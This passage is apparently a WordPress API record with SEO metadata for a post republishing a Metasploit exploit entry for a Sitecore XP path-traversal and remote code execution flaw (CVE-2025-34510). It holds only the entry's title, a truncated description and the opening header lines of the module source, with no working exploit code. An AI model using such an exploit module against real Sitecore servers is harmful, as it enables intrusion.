Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-WINDOWS-HTTP-SITECORE_XP_CVE_2025_34510-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-34509&#8243;,&#8221;CVE-2025-34510&#8243;],&#8221;sourceData&#8221;:&#8221;##n# This module requires Metasploit: https:\/\/metasploit.com\/downloadn# Current source: https:\/\/github.com\/rapid7\/metasploit-frameworkn##nnrequire &#8216;rex\/zip&#8217;nnclass MetasploitModule u003c Msf::Exploit::Remotenn Rank...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=17170\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-09-11T14:51:39+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"11 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=17170#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=17170\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Sitecore XP CVE-2025-34510 Post-Authentication Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-SITECORE_XP_CVE_2025_34510-\",\"datePublished\":\"2025-09-11T14:51:39+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=17170\"},\"wordCount\":2053,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.8\",\"exploit\",\"HIGH\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=17170#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=17170\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=17170\",\"name\":\"Sitecore XP CVE-2025-34510 Post-Authentication Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-SITECORE_XP_CVE_2025_34510- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-09-11T14:51:39+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=17170#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=17170\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=17170#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sitecore XP CVE-2025-34510 Post-Authentication Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-SITECORE_XP_CVE_2025_34510-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Sitecore XP CVE-2025-34510 Post-Authentication Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-SITECORE_XP_CVE_2025_34510- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=17170","og_locale":"en_US","og_type":"article","og_title":"Sitecore XP CVE-2025-34510 Post-Authentication Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-SITECORE_XP_CVE_2025_34510- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-09-11T19:04:31&#8243;,&#8221;description&#8221;:&#8221;This module exploits CVE-2025-34510, path traversal&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-09-11T18:57:23&#8243;,&#8221;modified&#8221;:&#8221;2025-09-11T18:57:23&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Sitecore XP CVE-2025-34510 Post-Authentication Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-WINDOWS-HTTP-SITECORE_XP_CVE_2025_34510-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-34509&#8243;,&#8221;CVE-2025-34510&#8243;],&#8221;sourceData&#8221;:&#8221;##n# This module requires Metasploit: https:\/\/metasploit.com\/downloadn# Current source: https:\/\/github.com\/rapid7\/metasploit-frameworkn##nnrequire &#8216;rex\/zip&#8217;nnclass MetasploitModule u003c Msf::Exploit::Remotenn Rank...","og_url":"https:\/\/zero.redgem.net\/?p=17170","og_site_name":"zero redgem","article_published_time":"2025-09-11T14:51:39+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"11 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=17170#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=17170"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Sitecore XP CVE-2025-34510 Post-Authentication Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-SITECORE_XP_CVE_2025_34510-","datePublished":"2025-09-11T14:51:39+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=17170"},"wordCount":2053,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.8","exploit","HIGH","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=17170#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=17170","url":"https:\/\/zero.redgem.net\/?p=17170","name":"Sitecore XP CVE-2025-34510 Post-Authentication Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-SITECORE_XP_CVE_2025_34510- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-09-11T14:51:39+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=17170#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=17170"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=17170#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Sitecore XP CVE-2025-34510 Post-Authentication Remote Code Execution_MSF:EXPLOIT-WINDOWS-HTTP-SITECORE_XP_CVE_2025_34510-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/17170","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17170"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/17170\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17170"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17170"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17170"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}